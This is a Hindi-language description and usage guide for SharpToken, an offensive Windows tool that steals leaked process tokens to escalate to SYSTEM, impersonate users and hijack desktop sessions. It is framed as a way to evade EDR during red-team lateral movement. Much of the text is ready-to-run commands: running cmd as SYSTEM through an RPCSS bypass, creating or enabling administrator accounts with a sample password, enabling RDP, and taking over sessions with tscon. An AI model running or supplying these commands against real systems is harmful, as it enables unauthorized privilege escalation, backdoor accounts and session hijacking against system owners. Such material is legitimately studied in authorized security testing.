
Windows टोकन चोरी और विशेषाधिकार वृद्धि उपकरण जो प्रक्रियाओं से लीक हुए टोकन चुराता है, SYSTEM-स्तर पहुंच, उपयोगकर्ता प्रतिरूपण, और पासवर्ड के बिना डेस्कटॉप स्विचिंग सक्षम करता है।
रेड टीम लेटरल मूवमेंट के दौरान, हमें अक्सर अन्य उपयोगकर्ताओं की अनुमतियाँ चुराने की आवश्यकता होती है। आधुनिक EDR की सुरक्षा के तहत, हमारे लिए Mimikatz का उपयोग करके अन्य उपयोगकर्ता अनुमतियाँ प्राप्त करना कठिन है, और यदि लक्ष्य उपयोगकर्ता की कोई प्रक्रिया जीवित नहीं है, तो हमारे पास Token चुराने के लिए "OpenProcessToken" का उपयोग करने का कोई तरीका नहीं है।
SharpToken एक उपकरण है जो Token लीक का शोषण करने के लिए है। यह सिस्टम में सभी प्रक्रियाओं से लीक हुए Token ढूंढ सकता है और उनका उपयोग कर सकता है। यदि आप कम-विशेषाधिकार वाले सेवा उपयोगकर्ता हैं, तो आप इसका उपयोग "NT AUTHORITY\SYSTEM" विशेषाधिकारों में अपग्रेड करने के लिए भी कर सकते हैं, और आप लक्ष्य उपयोगकर्ता के पासवर्ड के बिना उसके डेस्कटॉप पर स्विच करके अधिक कार्य कर सकते हैं। ..

SharpToken By BeichenDream
=========================================================
Github : https://github.com/BeichenDream/SharpToken
If you are an NT AUTHORITY\NETWORK SERVICE user then you just need to add the bypass parameter to become an NT AUTHORIT\YSYSTEM
e.g.
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass
Usage:
SharpToken COMMAND arguments
COMMANDS:
list_token [process pid] [bypass]
list_all_token [process pid] [bypass]
add_user <username> <password> [group] [domain] [bypass]
enableUser <username> <NewPassword> [NewGroup] [bypass]
delete_user <username> [domain] [bypass]
execute <tokenUser> <commandLine> [Interactive] [bypass]
enableRDP [bypass]
tscon <targetSessionId> [sourceSessionId] [bypass]
example:
SharpToken list_token
SharpToken list_token bypass
SharpToken list_token 6543
SharpToken add_user admin Abcd1234! Administrators
SharpToken enableUser Guest Abcd1234! Administrators
SharpToken delete_user admin
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass
SharpToken execute "NT AUTHORITY\SYSTEM" cmd true
SharpToken execute "NT AUTHORITY\SYSTEM" cmd true bypass
SharpToken tscon 1
सामान्य Token चोरी विशेषाधिकार वृद्धि के अलावा, SharpToken Bypass के माध्यम से अखंडता (integrity) वाले Token प्राप्त करने का भी समर्थन करता है।
यदि आप NT AUTHORITY/NETWORK SERVICE उपयोगकर्ता हैं और आप bypass पैरामीटर जोड़ते हैं, तो SharpToken RPCSS से System चुराएगा, अर्थात बिना शर्त NT AUTHORITY\NETWORK SERVICE से NT AUTHORITY\SYSTEM में अपग्रेड।

गणना की गई जानकारी में SID, LogonDomain, UserName, Session, LogonType, TokenType, TokenHandle (Duplicate के बाद Token का हैंडल), TargetProcessId (जिस प्रक्रिया से Token उत्पन्न होता है), TargetProcessToken (स्रोत प्रक्रिया में Token का हैंडल), Groups (जिस समूह में Token उपयोगकर्ता है) शामिल है।
SharpToken list_token

SharpToken list_token 468

execute "NT AUTHORITY\SYSTEM" cmd true

SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"

SharpToken add_user admin Abcd1234! Administrators
SharpToken enableUser Guest Abcd1234! Administrators
SharpToken delete_user admin
जहाँ 1 लक्ष्य उपयोगकर्ता का डेस्कटॉप है और 2 वह डेस्कटॉप है जिसे हम प्राप्त करना चाहते हैं
SharpToken tscon 1 2
https://www.tiraniddo.dev/2020/04/sharing-logon-session-little-too-much.html
https://github.com/decoder-it/NetworkServiceExploit